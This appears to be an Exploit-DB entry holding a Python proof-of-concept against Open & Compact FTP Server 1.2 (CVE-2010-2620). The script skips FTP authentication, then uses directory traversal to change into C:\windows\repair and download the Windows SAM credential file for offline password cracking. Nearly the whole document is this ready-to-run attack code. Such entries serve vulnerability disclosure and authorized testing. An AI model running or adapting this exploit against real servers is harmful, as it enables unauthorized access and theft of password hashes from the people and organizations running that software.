(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval

Author: Wireghoul
type: remote
platform: windows
port: 
date_added: 2013-08-07  
date_updated: 2013-08-07  
verified: 1  
codes: CVE-2010-2620;OSVDB-65687  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comopen-ftpd.1.2.tar.gz  

raw file: 27401.py  

#!/usr/bin/python
# Exploit Title: Open&Compact Ftp Server <= 1.2 Auth bypass & directory traversal sam retrieval
# Date: Aug 7, 2013
# By Wireghoul - http://www.justanotherhacker.com
# Based on Serge Gorbunov's auth bypass (http://www.exploit-db.com/exploits/13932/)
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3

# Abusing authentication bypass in combination with a directory traversal to grab
# the sam file for offline cracking

import ftplib
import os

# Connect to server

ftp = ftplib.FTP( "192.168.58.135" )
ftp.set_pasv( False )

# Note that we need no authentication at all!!

print ftp.sendcmd( 'CWD C:\\\\windows\\\\repair\\\\' )
print ftp.retrbinary('RETR sam', open('sam', 'wb').write )

ftp.quit()